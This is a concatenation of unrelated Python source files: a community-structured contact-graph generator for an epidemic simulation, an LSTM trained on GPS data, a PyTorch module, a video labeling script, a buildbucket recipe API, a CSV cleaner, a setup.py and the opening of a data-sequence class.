for adj in g[u]:
if adj in c:
adj_in_com += 1
return adj_in_com
def suboptimal(g, u, target_intra):
adj_in_com = intra_com_cons(g, u)
return (adj_in_com < target_intra) and target_intra > 0
def supoptimal(g, u, target_intra):
adj_in_com = intra_com_cons(g, u)
return adj_in_com > target_intra
@py_random_state(6)
def _powerlaw_sequence(gamma, low, high, condition, length, max_iters, seed):
"""Returns a list of numbers obeying a constrained power law distribution.
``gamma`` and ``low`` are the parameters for the Zipf distribution.
``high`` is the maximum allowed value for values draw from the Zipf
distribution. For more information, see :func:`_zipf_rv_below`.
``condition`` and ``length`` are Boolean-valued functions on
lists. While generating the list, random values are drawn and
appended to the list until ``length`` is satisfied by the created
list. Once ``condition`` is satisfied, the sequence generated in
this way is returned.
``max_iters`` indicates the number of times to generate a list
satisfying ``length``. If the number of iterations exceeds this
value, :exc:`~networkx.exception.ExceededMaxIterations` is raised.
seed : integer, random_state, or None (default)
Indicator of random number generation state.
See :ref:`Randomness<randomness>`.
"""
for i in range(max_iters):
seq = []
while not length(seq):
seq.append(_zipf_rv_below(gamma, low, high, seed))
if condition(seq):
return seq
raise nx.ExceededMaxIterations("Could not create power law sequence")
@py_random_state(4)
def _generate_communities(degree_seq, community_sizes, mu, max_iters, seed):
"""Returns a list of sets, each of which represents a community.
``degree_seq`` is the degree sequence that must be met by the
graph.
``community_sizes`` is the community size distribution that must be
met by the generated list of sets.
``mu`` is a float in the interval [0, 1] indicating the fraction of
intra-community edges incident to each node.
``max_iters`` is the number of times to try to add a node to a
community. This must be greater than the length of
``degree_seq``, otherwise this function will always fail. If
the number of iterations exceeds this value,
:exc:`~networkx.exception.ExceededMaxIterations` is raised.
seed : integer, random_state, or None (default)
Indicator of random number generation state.
See :ref:`Randomness<randomness>`.
The communities returned by this are sets of integers in the set {0,
..., *n* - 1}, where *n* is the length of ``degree_seq``.
"""
# This assumes the nodes in the graph will be natural numbers.
result = [set() for _ in community_sizes]
n = len(degree_seq)
free = list(range(n))
com_indices = range(len(community_sizes))
for i in range(max_iters):
v = free.pop()
c = seed.choice(com_indices)
# s = int(degree_seq[v] * (1 - mu) + 0.5)
s = round(degree_seq[v] * (1 - mu))
# If the community is large enough, add the node to the chosen
# community. Otherwise, return it to the list of unaffiliated
# nodes.
if s < community_sizes[c]:
result[c].add(v)
else:
free.append(v)
# If the community is too big, remove a node from it.
if len(result[c]) > community_sizes[c]:
rnd_node = seed.choice(tuple(result[c]))
free.append(rnd_node)
result[c].remove(rnd_node)
if not free:
return result
msg = "Could not assign communities; try increasing min_community"
raise nx.ExceededMaxIterations(msg)
class NetworkXWrappers(object):
@staticmethod
def add_lfr_weights(g):
g.remove_edges_from(nx.selfloop_edges(g))
edge_weights = {}
inter_actions_rvs = construct_pdf(
config["population"]["nx"]["inter freq pdf"]
).rvs
intra_actions_rvs = construct_pdf(
config["population"]["nx"]["intra freq pdf"]
).rvs
inter_actions = inter_actions_rvs(len(g))
intra_actions = intra_actions_rvs(len(g))
for edge in g.edges:
if edge[0] in g.nodes[edge[1]]["community"]:
intra_rate_0 = intra_actions[edge[0]] / g.degree[edge[0]]
intra_rate_1 = intra_actions[edge[1]] / g.degree[edge[1]]
avg_int = 0.5 * (intra_rate_0 + intra_rate_1)
# mu is the fraction of inter-community interacions
edge_weights[edge] = avg_int
else:
inter_rate_0 = inter_actions[edge[0]] / g.degree[edge[0]]
inter_rate_1 = inter_actions[edge[1]] / g.degree[edge[1]]
avg_int = 0.5 * (inter_rate_0 + inter_rate_1)
edge_weights[edge] = avg_int
nx.set_edge_attributes(g, edge_weights, "weight")
return g
@staticmethod
def lfr_benchmark(pop_size, **kwargs):
kwargs["seed"] = config["runtime"]["random state"]
g = nx.generators.community.LFR_benchmark_graph(pop_size, **kwargs)
g = NetworkXWrappers.add_lfr_weights(g)
return g
@staticmethod
def lfr_ba(pop_size, **kwargs):
seed = config["general"]["random state seed"]
random.seed(seed)
state = config["runtime"]["random state"]
kwargs["seed"] = seed
mu = kwargs["mu"]
g = nx.barabasi_albert_graph(pop_size, kwargs["m"], seed=seed)
deg_seq = list(dict(nx.degree(g)).values())
min_community = kwargs.get("min_community", None)
max_community = kwargs.get("max_community", None)
n = pop_size
# Validate parameters for generating the community size sequence.
if min_community is None:
min_community = min(deg_seq) + 1
else:
if min_community < min(deg_seq) + 1:
print("Min community is smaller than min(k)+1. Adjusting")
min_community = min(deg_seq) + 1
if max_community is None:
max_community = 3*max(deg_seq)
else:
if max_community < max(deg_seq) + 1:
print("Max community is smaller than max(k)+1. Adjusting")
max_community = int(2 * (max(deg_seq)))
low, high = min_community, max_community
def condition(seq):
return sum(seq) == n
def length(seq):
return sum(seq) >= n
comms = _powerlaw_sequence(
kwargs["tau"],
low,
high,
condition,
length,
kwargs["max_iters"],
seed,
)
communities = _generate_communities(deg_seq, comms, mu, 50 * n, seed)
g.remove_edges_from(nx.selfloop_edges(g))
for c in communities:
for u in c:
g.nodes[u]["community"] = c
node_degrees = np.asarray(list(dict(g.degree).values()))
num_inter_con = state.binomial(node_degrees, mu)
num_intra_con = node_degrees - num_inter_con
# print("Target mu: ", np.sum(num_inter_con) / np.sum(node_degrees))
max_it = 75
it = -1
last_mu = 0
no_change_for = 0
while True:
it += 1
"""
if it % 5 == 4:
num_inter_con = state.binomial(node_degrees, mu)
num_intra_con = node_degrees - num_inter_con
"""
intra_cnt = np.sum(
[v in g.nodes[u]["community"] for u, v in g.edges]
)
cur_mu = 1 - intra_cnt / g.number_of_edges()
if (
np.abs(cur_mu / mu - 1) < kwargs["tolerance"] * mu
or cur_mu < mu
):
break
if cur_mu == last_mu:
no_change_for += 1
if no_change_for == 5:
print(
"No change for five steps. Current mu: ",
cur_mu,
" Target: ",
mu,
)
break
else:
no_change_for = 0
last_mu = cur_mu
if it > max_it:
print(
"Max iterations reached. Current mu: ",
cur_mu,
" Target: ",
mu,
)
break
# First find all sub- and sup-optimal nodes
all_sub_optimal_nodes = set()
all_sup_optimal_nodes = set()
for u, n_inter_con, n_intra_con in zip(
g, num_inter_con, num_intra_con
):
c = g.nodes[u]["community"]
if supoptimal(g, u, n_intra_con):
all_sup_optimal_nodes.add(u)
elif suboptimal(g, u, n_intra_con):
all_sub_optimal_nodes.add(u)
assert len(all_sup_optimal_nodes & all_sub_optimal_nodes) == 0
for u, n_inter_con, n_intra_con in zip(
g, num_inter_con, num_intra_con
):
if node_degrees[u] < 2:
continue
c = g.nodes[u]["community"]
if (
u not in all_sub_optimal_nodes
and u not in all_sup_optimal_nodes
):
continue
sub_optimal_nodes = all_sub_optimal_nodes & c
sup_optimal_nodes = all_sup_optimal_nodes & c
not_optimal_nodes = sub_optimal_nodes | sup_optimal_nodes
attempted_vs = set()
if u in sub_optimal_nodes:
sub_optimal_nodes.remove(u)
not_optimal_nodes.remove(u)
all_sub_optimal_nodes.remove(u)
while True:
if len(not_optimal_nodes) < 1:
break
if not suboptimal(g, u, n_intra_con):
break
candidates = tuple(not_optimal_nodes - attempted_vs)
if not candidates:
break
if kwargs["pref_attach"]:
v = random.choices(
candidates,
weights=node_degrees[list(candidates)],
)[0]
else:
v = random.choice(candidates)
attempted_vs.add(v)
if v in sup_optimal_nodes:
# Strategy:
# -Rewire an internal connection from v to u
# -Rewire an external connection from u to v
# Get external adjacent node of u
target_1 = None
shuffled_adj = list(g[u])
random.shuffle(shuffled_adj)
for adj in shuffled_adj:
if (
adj not in c
and adj not in g[v]
and adj != v
):
target_1 = adj
break
if target_1 is None:
continue
# Get internal adjacent node of v
target_2 = None
for adj in g[v]:
if adj in c and adj not in g[u] and adj != u:
target_2 = adj
break
if target_2 is None:
continue
g.remove_edge(u, target_1)
g.remove_edge(v, target_2)
g.add_edge(u, target_2)
g.add_edge(v, target_1)
if not supoptimal(g, v, num_intra_con[v]):
sup_optimal_nodes.remove(v)
all_sup_optimal_nodes.remove(v)
not_optimal_nodes.remove(v)
else:
# Strategy:
# -Rewire an external connection from v to u
# -Rewire an external connection from u to v
# -Connect the two external nodes
# Pick a sub-optimal node from community
# v = random.choices(
# tuple(sub_optimal_nodes),
# weights=[g.degree[node]
# for node in sub_optimal_nodes])[0]
if v in g[u]:
continue
# From edges of u
shuffled_adj = list(g[u])
random.shuffle(shuffled_adj)
target_1 = None
for adj in shuffled_adj:
if adj not in c:
target_1 = adj
break
if target_1 is None:
break
target_2 = None
for adj in g[v]:
if (
adj not in c
# and adj in all_sup_optimal_nodes
and adj != target_1
and adj
not in g.nodes[target_1]["community"]
and adj not in g[target_1]
):
target_2 = adj
break
if target_2 is None:
break
g.add_edge(u, v)
g.remove_edge(u, target_1)
g.remove_edge(v, target_2)
g.add_edge(target_1, target_2)
if not suboptimal(g, v, num_intra_con[v]):
sub_optimal_nodes.remove(v)
all_sub_optimal_nodes.remove(v)
not_optimal_nodes.remove(v)
if suboptimal(g, u, num_intra_con[u]):
sub_optimal_nodes.add(u)
all_sub_optimal_nodes.add(u)
not_optimal_nodes.add(u)
# TODO: check targets?
else:
sup_optimal_nodes.remove(u)
all_sup_optimal_nodes.remove(u)
not_optimal_nodes.remove(u)
while True:
if len(sub_optimal_nodes) < 1:
break
if not supoptimal(g, u, n_intra_con):
break
candidates = tuple(sub_optimal_nodes - attempted_vs)
if not candidates:
break
if kwargs["pref_attach"]:
v = random.choices(
candidates,
weights=node_degrees[list(candidates)],
)[0]
else:
v = random.choice(candidates)
attempted_vs.add(v)
"""
v = random.choices(
tuple(sub_optimal_nodes),
weights=[g.degree[node]
for node in sub_optimal_nodes])[0]
"""
# Pick adjacent internal node
# u - target1
target_1 = None
shuffled_adj = list(g[u])
random.shuffle(shuffled_adj)
for adj in shuffled_adj:
if adj in c and adj not in g[v] and adj != v:
target_1 = adj
break
if target_1 is None:
# No luck this turn
break
target_2 = None
# Choose an inter-community edge from v
# v - target_2
for adj in g[v]:
if adj not in c and adj not in g[u]:
target_2 = adj
break
if target_2 is None:
break
g.remove_edge(u, target_1) # u-1i, target1-1i
g.remove_edge(v, target_2) # v-1e, target2-1e
g.add_edge(u, target_2) # u+1e, target2+1e
g.add_edge(v, target_1) # v+1i, target1+1i
if not suboptimal(g, v, num_intra_con[v]):
sub_optimal_nodes.remove(v)
all_sub_optimal_nodes.remove(v)
not_optimal_nodes.remove(v)
if not supoptimal(g, u, num_intra_con[u]):
sup_optimal_nodes.add(u)
all_sup_optimal_nodes.add(u)
not_optimal_nodes.add(u)
g = NetworkXWrappers.add_lfr_weights(g)
nx.set_node_attributes(
g, kwargs["symp_prob"], "symp_prob")
return g
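    # Note on the rewiring loop above: every swap removes one edge and adds
    # one edge per endpoint, so node degrees never change; edges are only
    # shifted between intra- and inter-community slots until the realized
    # mixing cur_mu reaches the target mu (or an iteration limit is hit).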
@staticmethod
def hierarchical_lfr_ba(pop_size, **kwargs):
seed = config["general"]["random state seed"]
n = pop_size
random.seed(seed)
def condition(seq):
return sum(seq) == n
def length(seq):
return sum(seq) >= n
graph_sizes = _powerlaw_sequence(
kwargs["tau_graphs"],
kwargs["min_graph"],
kwargs["max_graph"],
condition,
length,
kwargs["max_iters"],
seed,
)
cur_size = 0
combined = nx.Graph()
for hier_com, gs in enumerate(graph_sizes):
g = NetworkXWrappers.lfr_ba(gs, **kwargs)
mapping = {i: i+cur_size for i in range(gs)}
nx.relabel_nodes(g, mapping, copy=False)
for node in g:
g.nodes[node]["hier_comm"] = hier_com
comm = g.nodes[node]["community"]
                relabeled_comm = set()
                for val in list(comm):
                    relabeled_comm.add(val + cur_size)
                g.nodes[node]["community"] = relabeled_comm
combined.add_nodes_from(g.nodes(data=True))
combined.add_edges_from(g.edges)
cur_size += gs
for u in combined:
this_hcomm = combined.nodes[u]["hier_comm"]
adjs = combined[u]
for adj in list(adjs):
if (adj not in combined.nodes[u]["community"]
and random.uniform(0, 1) < kwargs["mu_hier"]/2):
while True:
randint = random.randint(0, pop_size-1)
v = combined.nodes[randint]
if randint == u:
continue
if randint in combined.nodes[u]["community"]:
continue
if v["hier_comm"] == this_hcomm:
continue
partner = None
for adj2 in list(combined[randint]):
if (adj2 not in v["community"] and
adj2 not in combined.nodes[u]["community"]):
partner = adj2
break
if partner is not None:
break
combined.remove_edge(u, adj)
combined.remove_edge(randint, partner)
combined.add_edge(u, randint)
combined.add_edge(adj, partner)
combined = NetworkXWrappers.add_lfr_weights(combined)
        nx.set_node_attributes(
            combined, kwargs["school_symp_prob"], "symp_prob")
return combined
@staticmethod
def relaxed_caveman_graph(pop_size, **kwargs):
clique_size = kwargs["clique_size"]
n_cliques = pop_size // clique_size
p = kwargs["p"]
g = nx.relaxed_caveman_graph(n_cliques, clique_size, p)
g.remove_edges_from(nx.selfloop_edges(g))
if kwargs["pruning_frac"] > 0:
rem_edges = random.sample(
g.edges,
k=int(kwargs["pruning_frac"] * len(g.edges))
)
g.remove_edges_from(rem_edges)
return g
@staticmethod
def schools_model(pop_size, **kwargs):
rstate = config["runtime"]["random state"]
school_graph = NetworkXWrappers.relaxed_caveman_graph(
pop_size, **kwargs
)
nx.set_node_attributes(
school_graph, kwargs["school_symp_prob"], "symp_prob")
# add families
family_sizes = scipy.stats.nbinom.rvs(
8, 0.9, size=len(school_graph), random_state=rstate) + 1
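        # nbinom(n=8, p=0.9) has mean n * (1 - p) / p ~= 0.89, so with the
        # +1 each school node gets a family of about 1.9 members on average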
cur_size = len(school_graph)
combined = nx.Graph()
combined.add_nodes_from(school_graph.nodes(data=True))
combined.add_edges_from(school_graph.edges)
for node, fam_size in zip(school_graph.nodes, family_sizes):
combined.nodes[node]["type"] = "school"
combined.nodes[node]["random_testable"] = True
combined.nodes[node]["family_index"] = node
f_graph = nx.generators.complete_graph(fam_size)
nx.set_node_attributes(
f_graph, kwargs["family_symp_prob"], "symp_prob")
mapping = {i: i+cur_size for i in range(fam_size)}
nx.relabel_nodes(f_graph, mapping, copy=False)
for v in f_graph.nodes:
f_graph.nodes[v]["type"] = "family"
f_graph.nodes[v]["family_index"] = node
f_graph.nodes[v]["random_testable"] = False
combined.add_nodes_from(f_graph.nodes(data=True))
for v in f_graph.nodes:
combined.add_edge(node, v)
combined.add_edges_from(f_graph.edges)
cur_size += fam_size
combined.graph["n_school"] = len(school_graph)
return combined
class NetworkXPopulation(Population):
def __init__(self, interaction_rate_scaling=1, *args, **kwargs):
super().__init__(
interaction_rate_scaling=interaction_rate_scaling, *args, **kwargs
)
self._random_interact_pdf = construct_pdf(
config["population"]["random interactions pdf"]
)
self._random_interact_intensity_pdf = construct_pdf(
config["population"]["random interactions intensity pdf"]
)
gen_func = getattr(
NetworkXWrappers, config["population"]["nx"]["func"]
)
self._graph = gen_func(
self._pop_size, **(config["population"]["nx"]["kwargs"])
)
for node in self._graph:
self._graph.nodes[node]["history"] = {}
def get_contacts(
self, rows: np.ndarray, cols: np.ndarray, return_rows=False
) -> Union[
Tuple[np.ndarray, np.ndarray],
Tuple[np.ndarray, np.ndarray, np.ndarray],
]:
contact_cols = []
contact_rows = []
n_rnd_contacts = np.asarray(
np.round(self._random_interact_pdf.rvs(rows.shape[0])),
            dtype=int,
)
rnd_indices_all = np.split(
self._rstate.randint(
                0, len(rows), size=np.sum(n_rnd_contacts), dtype=int
),
np.cumsum(n_rnd_contacts),
)[:-1]
rnd_ctc_intens_all = np.split(
self._random_interact_intensity_pdf.rvs(np.sum(n_rnd_contacts)),
np.cumsum(n_rnd_contacts),
)[:-1]
col_set = set(cols)
for row, n_rnd_contact, rnd_indices, rnd_ctc_intens in zip(
rows, n_rnd_contacts, rnd_indices_all, rnd_ctc_intens_all):
sel_cols = []
sel_rows = []
adj = self._graph[row]
for ctc_ind, node_attrs in adj.items():
if ctc_ind not in col_set:
continue
sel_cols.append(ctc_ind)
sel_rows.append(row)
for rnd_ind, intens in zip(rnd_indices, rnd_ctc_intens):
if rnd_ind not in col_set:
continue
if rnd_ind not in adj:
sel_cols.append(rnd_ind)
sel_rows.append(row)
contact_cols.append(np.array(sel_cols, dtype=int))
contact_rows.append(np.array(sel_rows, dtype=int))
if contact_cols:
contact_cols = np.concatenate(contact_cols)
contact_rows = np.concatenate(contact_rows)
unique_indices, ind, counts = np.unique(
contact_cols, return_index=True, return_counts=True
)
contact_cols = unique_indices
# contact_rates = contact_rates[ind] * counts
contact_rows = contact_rows[ind]
contact_strengths = np.ones_like(unique_indices) * counts
else:
contact_cols = np.empty(0, dtype=int)
contact_rows = np.empty(0, dtype=int)
contact_strengths = np.empty(0, dtype=int)
if return_rows:
return contact_cols, contact_strengths, contact_rows
else:
return contact_cols, contact_strengths
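# The deduplication in get_contacts leans on np.unique; a small sketch of
# the collapsing step (contact ids are illustrative):
#   cols = np.array([3, 5, 3, 7, 5, 3])
#   uniq, idx, cnt = np.unique(cols, return_index=True, return_counts=True)
#   uniq -> [3, 5, 7], cnt -> [3, 2, 1]: one row per unique contact, with
#   the repeat count becoming that contact's strength.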
|
nilq/baby-python
|
python
|
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
from tensorflow.keras import Sequential
from tensorflow.keras.layers import Dense, LSTM, Dropout
from sklearn.preprocessing import MinMaxScaler
dataset = pd.read_csv('../Dataset/GPS Database Cleaned Data-One Day.csv', parse_dates=True, index_col='date_time')
# round the coordinate columns (8, 9, 10) to 5 decimal places
dataset = np.array(dataset)
n_rows = dataset.shape[0]
for row in range(n_rows):
    dataset[row, 8] = round(dataset[row, 8], 5)
    dataset[row, 9] = round(dataset[row, 9], 5)
    dataset[row, 10] = round(dataset[row, 10], 5)
# categorical data encoding
from sklearn.preprocessing import OneHotEncoder
from sklearn.compose import ColumnTransformer
transformer = ColumnTransformer(
transformers=[
("OneHotEncoder", # Just a name
OneHotEncoder(), # The transformer class
[0] # The column(s) to be applied on.
)
],
remainder='passthrough'
)
dataset = transformer.fit_transform(dataset)
# Avoiding Dummy Variable Trap
# dataset = dataset[:, 1:]
transformer = ColumnTransformer(
transformers=[
("OneHotEncoder", # Just a name
OneHotEncoder(), # The transformer class
[1] # The column(s) to be applied on.
)
],
remainder='passthrough'
)
dataset = transformer.fit_transform(dataset)
# Avoiding Dummy Variable Trap
# dataset = dataset[:, 1:]
transformer = ColumnTransformer(
transformers=[
("OneHotEncoder", # Just a name
OneHotEncoder(), # The transformer class
[2] # The column(s) to be applied on.
)
],
remainder='passthrough'
)
dataset = transformer.fit_transform(dataset)
dataset=dataset.astype('float32')
# Avoiding Dummy Variable Trap
# dataset = dataset[:, 1:]
# Feature Scaling
from sklearn.preprocessing import StandardScaler
#
scaler = MinMaxScaler(feature_range=(0, 2))
# scaler = StandardScaler()
# dataset = scaler.fit_transform(dataset)
# spliting the dataset into test data and training data
from sklearn.model_selection import train_test_split
training_set, test_set = train_test_split(dataset, test_size=0.1)
# Prepare Training Data
X_train, y_train = [], []
for i in range(6, training_set.shape[0] - 7):
X_train.append(training_set[i - 6:i])
y_train.append(training_set[i+1, 8])
X_train = np.array(X_train)
y_train = np.array(y_train)
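# X_train has shape (samples, 6, width): each sample is a 6-row window of
# the encoded features, and y_train holds column 8 taken from row i+1,
# i.e. two rows past the end of the window.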
# X_train = np.reshape(X_train.shape[0], X_train.shape[1], 1)
# y_train = np.reshape(y_train.shape[0], y_train.shape[1], 1)
# Build LSTM
regressor = Sequential()
regressor.add(LSTM(units=100, activation='relu', input_shape=(X_train.shape[1], 11), return_sequences=True))
regressor.add(Dropout(0.2))
regressor.add(LSTM(units=170, activation='relu', return_sequences=True))
regressor.add(Dropout(0.3))
regressor.add(LSTM(units=190, activation='relu', return_sequences=True))
regressor.add(Dropout(0.4))
regressor.add(LSTM(units=250, activation='relu'))
regressor.add(Dropout(0.5))
regressor.add(Dense(units=1))
regressor.compile(optimizer='adam', loss='mean_squared_error', metrics=['accuracy'])
regressor.fit(X_train, y_train, epochs=15, batch_size=10)
# prepare test set
training_set = pd.DataFrame(training_set)
test_set = pd.DataFrame(test_set)
# 6*10
past_60_seconds = training_set.tail(6)
test_set = pd.concat([past_60_seconds, test_set], ignore_index=True)
X_test, y_test = [], []
test_set = np.array(test_set)
for i in range(6, test_set.shape[0] - 6):
X_test.append(test_set[i - 6:i])
y_test.append(test_set[i, 8])
X_test = np.array(X_test)
y_test = np.array(y_test)
X_test_0 = X_train[0]
X_test_0 = np.array(X_test_0)
X_test_0 = X_test_0.reshape(1, 6, 11)
y_pred_0 = regressor.predict(X_test_0)
X_test_1 = X_train[1]
X_test_1 = np.array(X_test_1)
X_test_1 = X_test_1.reshape(1, 6, 11)
y_pred_1 = regressor.predict(X_test_1)
X_test_2 = X_train[2]
X_test_2 = np.array(X_test_2)
X_test_2 = X_test_2.reshape(1, 6, 11)
y_pred_2 = regressor.predict(X_test_2)
y_pred = regressor.predict(X_test)
|
nilq/baby-python
|
python
|
import torch.nn as nn
from MyPyTorchAPI.CustomActivation import *
class FCCov(torch.nn.Module):
def __init__(self, fc_input_size):
super().__init__()
self.fc = nn.Sequential(
nn.Linear(fc_input_size, 512),
nn.BatchNorm1d(512),
nn.PReLU(),
nn.Linear(512, 64),
nn.BatchNorm1d(64),
nn.PReLU(),
nn.Linear(64, 64),
nn.BatchNorm1d(64),
Sigmoid(a=0.1, max=1),
nn.Linear(64, 6))
def forward(self, x):
x = self.fc(x)
return x
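# Minimal smoke-test sketch (assumes the custom Sigmoid imported above is
# available; BatchNorm1d needs a batch of more than one sample):
#   net = FCCov(fc_input_size=128)
#   out = net(torch.randn(4, 128))  # -> tensor of shape (4, 6)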
|
nilq/baby-python
|
python
|
#!/usr/bin/env python
import matplotlib.pyplot as plt
import os
import imageio
import numpy as np
import cv2
from tqdm import tqdm_notebook as tqdm
import scipy.misc
from generator import read_videofile_txt
import os
import shutil
from generator import build_label2str
from predict_and_save_kitty import extract_bbox_for_line
import cv2
def save_vid_with_labels(kitty_folder, video_path, frame_output_folder, label_csv, id_format_colon=False, verbose=True):
'''Saves a video frame by frame where a bounding box is drawn around the detected
persons and an action label is provided.
Needs a kitty folder where the kitty files have action labels.'''
vid = imageio.get_reader(video_path, 'ffmpeg')
total_frames=len(vid)
kitty_files = sorted(os.listdir(kitty_folder))
frame_idxs = [int(n.split('.')[0].split('_')[-1])-1 for n in kitty_files]
if verbose:
print('Video loaded, len frame_idxs:', len(frame_idxs), 'len vid:', len(vid))
# Get label to string dict
label2str_dict = build_label2str(label_csv)
label2str_dict[-1] = 'undefined'
print('label2str_dict',label2str_dict)
if not os.path.exists(frame_output_folder):
os.mkdir(frame_output_folder)
for num in tqdm(range(total_frames)):
# check for valid frame number
# if num >= 0 & num <= totalFrames:
# # set frame position
# cap.set(cv2.CAP_PROP_POS_FRAMES,myFrameNumber)
# ret, img = cap.read()
# print('ret:',ret)
img = vid.get_data(num)
if num in frame_idxs:
# Read txt file
txt_line_list = read_videofile_txt(os.path.join(kitty_folder,kitty_files[num]))
# print('txt_line_list:',txt_line_list)
# Get all bboxes for this frame
for j,line in enumerate(txt_line_list):
# Extract id
if id_format_colon:
id_ = int(float(line.split(' ')[0].split(':')[-1]))
else:
id_ = int(float(line.split(' ')[1]))
# Extract action label
act_label = int(float(line.split(' ')[-1]))
if act_label == -1:
font_size=0.5
font_color = (200,200,0)
bbox_color = (100,0,0)
else:
font_size=0.8
font_color = (255,255,0)
bbox_color = (255,0,0)
text_label = label2str_dict[act_label]
# print('text_label:', text_label)
# Getting bbox
crop, bbox = extract_bbox_for_line(line, img, idx_bbox=3, margin=0.0, show=False, debug=False, k=1.0)
left, right, top, bottom = bbox
cv2.rectangle(img, (left,top), (right,bottom), bbox_color, 2)
cv2.putText(img, text_label, (left, top), cv2.FONT_HERSHEY_SIMPLEX, font_size, font_color, lineType=cv2.LINE_AA)
# if not num%10:
# plt.figure()
# plt.imshow(img)
# plt.show()
imageio.imwrite(os.path.join(frame_output_folder, str(num)+'.jpg'), img)
if __name__ == "__main__":
save_vid_with_labels('../../../p2_metropolis/tmp/cfosco/VIDEOS/KITTI_CFOSCOnyc_c0110_2/with_action_labels',
'../../../p2_metropolis/tmp/cfosco/VIDEOS/nyc_c0110_2.mp4',
frame_output_folder = '../tmp_vid', label_csv='../../../nfs_share/datasets/IVA_Videos/crops_mixed_aux/labels_5.csv')
|
nilq/baby-python
|
python
|
# Copyright 2016 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""API for interacting with the buildbucket service directly.
Instead of triggering jobs by emitting annotations then handled by the master,
this module allows slaves to directly post requests to buildbucket.
"""
import json
import os
import uuid
from recipe_engine import recipe_api
class BuildbucketApi(recipe_api.RecipeApi):
"""A module for interacting with buildbucket."""
def __init__(self, buildername, buildnumber, *args, **kwargs):
super(BuildbucketApi, self).__init__(*args, **kwargs)
self._buildername = buildername
self._buildnumber = buildnumber
self._properties = None
def get_config_defaults(self):
if self.m.platform.is_win:
return {'PLATFORM': 'win'}
return {'PLATFORM': 'default'}
def _configure_defaults(self):
"""Apply default configuration if no configuration has been set.
Ideally whoever uses this api will explicitly set the configuration by
doing `api.buildbucket.set_config('production_buildbucket')`, but to make
this module usable even in case they don't configure it, we set the default
to the production instance of buildbucket."""
    # There are only two items in this module's configuration: the path to the
    # buildbucket cli client binary and the buildbucket hostname. This default
    # configuration will override them.
if not self.c or not self.c.complete():
self.set_config('production_buildbucket')
def _tags_for_build(self, bucket, parameters, override_tags=None):
buildbucket_info = self.properties or {}
original_tags_list = buildbucket_info.get('build', {}).get('tags', [])
original_tags = dict(t.split(':', 1) for t in original_tags_list)
new_tags = {'user_agent': 'recipe'}
if 'buildset' in original_tags:
new_tags['buildset'] = original_tags['buildset']
builder_name = parameters.get('builder_name')
if builder_name:
new_tags['builder'] = builder_name
if bucket.startswith('master.'):
new_tags['master'] = bucket[7:]
if self._buildnumber is not None:
new_tags['parent_buildnumber'] = str(self._buildnumber)
if self._buildername is not None:
new_tags['parent_buildername'] = str(self._buildername)
new_tags.update(override_tags or {})
return sorted([':'.join((x, y)) for x, y in new_tags.iteritems()])
@property
def properties(self):
"""Returns (dict-like or None): The BuildBucket properties, if present."""
if self._properties is None:
# Not cached, load and deserialize from properties.
props = self.m.properties.get('buildbucket')
if props is not None:
if isinstance(props, basestring):
props = json.loads(props)
self._properties = props
return self._properties
def put(self, builds, service_account=None, **kwargs):
"""Puts a batch of builds.
Args:
builds (list): A list of dicts, where keys are:
'bucket': (required) name of the bucket for the request.
'parameters' (dict): (required) arbitrary json-able parameters that a
build system would be able to interpret.
'tags': (optional) a dict(str->str) of tags for the build. These will
be added to those generated by this method and override them if
appropriate.
        'client_operation_id': (optional) an arbitrary string, ideally random,
used to prevent duplication of requests upon retry.
service_account (str): (optional) path to locally saved secrets for
service account to authenticate as.
Returns:
      A step whose .stdout property contains the response object as
returned by buildbucket.
"""
build_specs = []
for build in builds:
client_operation_id = build.get('client_operation_id', uuid.uuid4().hex)
build_specs.append(json.dumps({
'bucket': build['bucket'],
'parameters_json': json.dumps(build['parameters'], sort_keys=True),
'client_operation_id': client_operation_id,
'tags': self._tags_for_build(build['bucket'],
build['parameters'],
build.get('tags'))
}, sort_keys=True))
return self._call_service('put', build_specs, service_account, **kwargs)
def cancel_build(self, build_id, service_account=None, **kwargs):
return self._call_service('cancel', [build_id], service_account, **kwargs)
def get_build(self, build_id, service_account=None, **kwargs):
return self._call_service('get', [build_id], service_account, **kwargs)
def _call_service(self, command, args, service_account=None, **kwargs):
# TODO: Deploy buildbucket client using cipd.
self._configure_defaults()
step_name = kwargs.pop('name', 'buildbucket.' + command)
if service_account:
args = ['--service-account-json', service_account] + args
args = [str(self.c.buildbucket_client_path), command, '--host',
self.c.buildbucket_host] + args
return self.m.step(
step_name, args, stdout=self.m.json.output(), **kwargs)
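# Usage sketch from a recipe (bucket and builder names are hypothetical):
#   result = api.buildbucket.put([{
#       'bucket': 'master.tryserver.example',
#       'parameters': {'builder_name': 'example_rel'},
#   }])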
|
nilq/baby-python
|
python
|
from parsers import golden_horse_parser
parser = golden_horse_parser()
args = parser.parse_args()
REDUNDANT_INFO_LINE_NUM = 4
TRAILING_USELESS_INFO_LINE_NUM = -1
def clean_line(string, remove_trailing_position=-2):
    return string.replace('\t', '').split(',')[:remove_trailing_position]
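# For example (tab characters are stripped, and with the default of -2 the
# last two comma-separated fields are dropped; values are illustrative):
#   clean_line("2330,TSMC,100,+1.5,close\t") -> ['2330', 'TSMC', '100']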
def main():
with open(args.input, encoding=args.encoding) as file_handle:
lines = file_handle.readlines()[
REDUNDANT_INFO_LINE_NUM:TRAILING_USELESS_INFO_LINE_NUM
]
cleaned_lines = [
clean_line(line) for line in lines
]
with open(args.output, 'w') as file_handle:
for line in cleaned_lines:
file_handle.write(f'{",".join(line)}\n')
if __name__ == '__main__':
main()
|
nilq/baby-python
|
python
|
from setuptools import setup
setup(name='money',
version='0.1',
      description='Implementation of Fowler\'s Money',
url='https://github.com/luka-mladenovic/fowlers-money',
author='Luka Mladenovic',
author_email='',
license='MIT',
packages=['money'],
install_requires=[
'pyyaml',
],
zip_safe=False)
|
nilq/baby-python
|
python
|
from . import sequence
from . import sampler as sampler_trw
import numpy as np
import collections
import copy
from ..utils import get_batch_n, len_batch
# this the name used for the sample UID
sample_uid_name = 'sample_uid'
class SequenceArray(sequence.Sequence):
"""
Create a sequence of batches from numpy arrays, lists and :class:`torch.Tensor`
"""
def __init__(
self,
split,
sampler=sampler_trw.SamplerRandom(),
transforms=None,
use_advanced_indexing=True,
sample_uid_name=sample_uid_name):
"""
Args:
split: a dictionary of tensors. Tensors may be `numpy.ndarray`, `torch.Tensor`, numeric
sampler: the sampler to be used to iterate through the sequence
transforms: a transform or list of transforms to be applied on each batch of data
use_advanced_indexing:
sample_uid_name: if not `None`, create a unique UID per sample so that it is easy to track
particular samples (e.g., during data augmentation)
"""
